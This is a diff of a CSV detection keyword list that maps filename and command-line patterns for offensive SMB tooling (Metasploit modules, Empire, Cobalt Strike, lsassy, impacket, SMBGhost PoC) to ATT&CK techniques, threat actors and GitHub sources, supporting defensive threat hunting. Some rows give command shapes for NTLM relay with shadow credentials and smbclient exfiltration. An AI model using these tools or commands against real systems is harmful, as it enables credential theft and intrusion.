TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*smb_rras_erraticgopher.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_shadow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_shadow.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_stealth.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*smb/impacket*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb/relay/ntlm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_doublepulsar_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_doublepulsar_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_enumshares*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_enumshares.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_enumusers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_enumusers.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_enumusers_domain.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_eternalblue*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smb_ms17_010_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_pipename_stager*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*smb_rras_erraticgopher.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_shadow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_shadow.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_stealth.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*smb_win.py*","offensive_tool_keyword","SMBGhost_RCE_PoC","RCE PoC for CVE-2020-0796 SMBGhost","T1210 - T1059 - T1505 - T1021 - T1027","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/chompie1337/SMBGhost_RCE_PoC","1","1","N/A","N/A","10","1264","355","2020-07-02T18:51:47Z","2020-06-02T00:14:47Z" -"*smb1_anonymous_connect_ipc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*smb1_anonymous_login*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smb1_anonymous_connect_ipc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smb1_anonymous_login*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*-smb2support --remove-mic --shadow-credentials --shadow-target *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*smbattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*smbattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*smbattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*smbclient \\\\\\\\*\\\\TRANSFER -N -p * -c \*put *","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*smbcrawler*","offensive_tool_keyword","smbcrawler","SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares","T1077 - T1021 - T1110 - T1083","TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement - Collection","https://github.com/SySS-Research/smbcrawler","1","1","N/A","N/A","2","129","13","2023-05-14T06:48:40Z","2021-06-09T19:27:08Z" -"*SMBeagle.exe*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" -"*SMBeagle.sln*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" 